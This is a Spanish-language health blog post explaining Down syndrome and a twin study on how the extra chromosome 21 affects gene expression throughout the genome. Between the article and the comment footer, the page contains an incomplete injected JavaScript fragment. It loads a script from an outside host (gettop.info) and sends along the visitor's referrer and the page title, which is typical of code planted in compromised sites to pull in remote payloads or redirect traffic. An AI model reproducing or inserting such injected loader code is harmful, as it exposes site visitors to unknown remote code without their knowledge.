Salud y belleza » Enfermedades, Salud, salud mental

El síndrome de Down y el cromosoma 21

Sin Comentarios

Las personas con síndrome de Down en vez de dos copias del cromosoma 21 tienen tres. Todavía los científicos no han logrado descubrir cuál es el mecanismo por el que se crea esta copia, pero es muy difícil hacerlo y distinguir entre el problema génico y las variaciones naturales de los individuos.

sindrome-de-down

Ahora un equipo de investigación ha conseguido descubrir algunas de las partes de ese camino genético por el que una persona llega a tener tres cromosomas 21 en lugar de 2 y, por tanto, sufre Síndrome de Down. Según las primeras conclusiones esas alteraciones no se limitarían únicamente al cromosoma 21, sino que alterarían el resto del genoma también.

Para realizar la investigación, los científicos tuvieron frente a ellos un caso en el que estudiaron a dos gemelos y solo uno de ellos tenía Síndrome de Down. Tenían un genoma idéntico salvo por el cromosoma 21, por lo que los investigadores pudieron separar la expresión genética individual con la relacionada con el trastorno.

estudio-sindrome-down

Descubrieron además que la alteración del cromosoma 21, algo que podría parecer insignificante, tiene gran influencia en el resto el genoma. Esto es lo que provoca alteraciones en el proceso de descodificación de la información, por lo que cambia las funciones celulares normales.

Este nuevo estudio ha abierto el camino hacia nuevas vías de investigación del Síndrome de Down y podría ayudar a explicar por qué se produce y si se puede evitar.

¿Conoces a alguien con Síndrome de Down? ¿Cómo es su caso?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza :

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.